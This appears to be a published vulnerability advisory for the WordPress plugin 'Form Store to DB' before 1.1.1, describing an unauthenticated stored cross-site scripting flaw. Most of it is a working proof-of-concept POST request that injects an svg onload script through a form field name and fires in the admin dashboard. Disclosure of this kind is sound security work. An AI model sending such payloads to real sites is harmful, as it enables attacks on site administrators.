Skip to content

Latest commit

 

History

History
63 lines (27 loc) · 1.39 KB

File metadata and controls

63 lines (27 loc) · 1.39 KB

Form Store to DB < 1.1.1 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not sanitise and escape parameter keys before outputting it back in the created entry, allowing unauthenticated attacker to perform Cross-Site Scripting attacks against admin

Proof of Concept

POST /wp-json/contact-form-7/v1/contact-forms/1337/feedback HTTP/2

Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470



-----------------------------243715402120191890871051639470

Content-Disposition: form-data; name="your-name"



Attacker

-----------------------------243715402120191890871051639470

Content-Disposition: form-data; name="your-email"



[email protected]

-----------------------------243715402120191890871051639470

Content-Disposition: form-data; name="your-subject"



XSS Injection

-----------------------------243715402120191890871051639470

Content-Disposition: form-data; name="your-message"



Sorry, not sorry.

-----------------------------243715402120191890871051639470

Content-Disposition: form-data; name="AA<svg/onload=(alert)(/XSS/)>"



Injected

-----------------------------243715402120191890871051639470--





The XSS will be triggered when viewing the related Entry in the admin dashboard (/wp-admin/edit.php?post_type=cf7storetodbs) 

References

https://wpscan.com/vulnerability/3999a1b9-df85-43b1-b412-dc8a6f71cc5d